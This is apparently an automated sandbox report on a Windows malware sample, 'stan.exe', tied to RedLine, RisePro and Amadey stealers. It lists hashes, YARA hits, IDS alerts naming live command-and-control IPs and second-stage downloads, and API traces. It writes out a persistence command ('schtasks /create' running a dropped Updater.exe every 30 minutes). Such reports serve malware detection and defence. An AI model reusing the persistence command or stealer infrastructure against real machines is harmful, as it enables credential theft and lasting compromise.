Summary | ZeroBOX

stan.exe

RedLine stealer Client SW User Data Stealer RedlineStealer RedLine Infostealer info stealer Amadey NSIS UltraVNC Themida Generic Malware Hide_EXE browser Google Malicious Library Downloader Chrome User Data UPX Malicious Packer VNC
Category FILE
Machine s1_win7_x6401
Started Jan. 25, 2024, 8:51 a.m.
Completed Jan. 25, 2024, 8:58 a.m.
Size 1.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 04301ab0e3daa0be320a90c29059f088
SHA256 3152c20662edc2b3ece83f56ca9517386693b5420d2ffaf2da46775c59125596
CRC32 9E853CC5
ssdeep 24576:gnbpSUaR+4esvDPmdnwQpyEvOF8txGjU5ZbmNrUVETbpq4:gnbwR+4eiDWlyutxGj0ZSgK1q
Yara
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • themida_packer - themida packer


Suricata Alerts

Flow SID Signature Category
TCP 193.233.132.62:50500 -> 192.168.56.101:49165 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.101:49165 2046267 ET MALWARE [ANY.RUN] RisePro TCP (External IP) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2046270 ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration) Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 193.233.132.62:50500 2046269 ET MALWARE [ANY.RUN] RisePro TCP (Activity) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49166 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 109.107.182.3:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 64.233.188.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49186 -> 142.251.220.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49191 -> 142.250.204.36:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2400020 ET DROP Spamhaus DROP Listed Traffic Inbound group 21 Misc Attack
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49183 -> 64.233.188.84:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49193 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49192 -> 142.250.204.36:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 185.215.113.68:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.101:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 142.251.220.35:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.101:49205 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49193 -> 185.215.113.68:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49207 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49205 -> 193.233.132.62:50500 2049060 ET MALWARE Suspected RisePro TCP Heartbeat Packet A Network Trojan was detected
TCP 192.168.56.101:49212 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 109.107.182.3:80 -> 192.168.56.101:49176 2014819 ET INFO Packed Executable Download Misc activity
TCP 193.233.132.62:50500 -> 192.168.56.101:49204 2046266 ET MALWARE [ANY.RUN] RisePro TCP (Token) Malware Command and Control Activity Detected
TCP 192.168.56.101:49209 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 34.117.186.192:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 34.117.186.192:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49260 -> 185.172.128.19:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.101:49260 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 185.172.128.90:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.101:49201 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 80.79.4.61:18236 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49322 -> 80.79.4.61:18236 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.101:49323 -> 141.95.211.148:46011 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 141.95.211.148:46011 -> 192.168.56.101:49323 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.101:49335 -> 195.20.16.103:20440 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) A Network Trojan was detected
TCP 195.20.16.103:20440 -> 192.168.56.101:49335 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.101:49201 -> 109.107.182.3:80 2022491 ET HUNTING Download Request Containing Suspicious Filename - Crypted A Network Trojan was detected
TCP 192.168.56.101:49298 -> 154.92.15.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.101:49168 -> 104.26.4.15:443
  Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
  Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
  Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49184 -> 64.233.188.84:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=accounts.google.com
  Fingerprint: e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
TLSv1 192.168.56.101:49186 -> 142.251.220.35:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=*.gstatic.com
  Fingerprint: 4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1 192.168.56.101:49191 -> 142.250.204.36:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=www.google.com
  Fingerprint: 3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLSv1 192.168.56.101:49183 -> 64.233.188.84:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=accounts.google.com
  Fingerprint: e9:00:f4:02:db:2e:43:07:4d:00:d0:33:77:6d:2b:38:28:c5:a2:b6
TLSv1 192.168.56.101:49192 -> 142.250.204.36:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=www.google.com
  Fingerprint: 3a:23:7a:7e:16:ae:ac:26:15:62:07:69:2e:e7:ad:8f:9d:b5:90:b7
TLSv1 192.168.56.101:49185 -> 142.251.220.35:443
  Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1C3
  Subject: CN=*.gstatic.com
  Fingerprint: 4c:e1:1e:e3:63:49:81:bb:f5:53:ce:44:91:07:8a:14:84:70:7f:66
TLSv1 192.168.56.101:49212 -> 104.26.4.15:443
  Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
  Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
  Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49209 -> 104.26.4.15:443
  Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
  Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
  Fingerprint: 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49298 -> 154.92.15.189:443
  Issuer: C=US, O=Let's Encrypt, CN=R3
  Subject: CN=i.alie3ksgaa.com
  Fingerprint: e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Roaming\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: chcp
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Roaming\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Active code page: 1251
console_handle: 0x00000013
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x003fb5f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 42742704
registers.esi: 5
registers.ecx: 42742704
1 0 0

__exception__

stacktrace:
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

stacktrace:
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

stacktrace:
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

stacktrace:
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

stacktrace:
stan+0x298ba3 @ 0xe68ba3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 13729792
1 0 0

__exception__

stacktrace:
stan+0x298ba3 @ 0xe68ba3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 282235020
1 0 0

__exception__

stacktrace:
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298d51 @ 0xe68d51
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 1506740
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 3063651348
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 3322538752
1 0 0

__exception__

stacktrace:
stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

stacktrace:
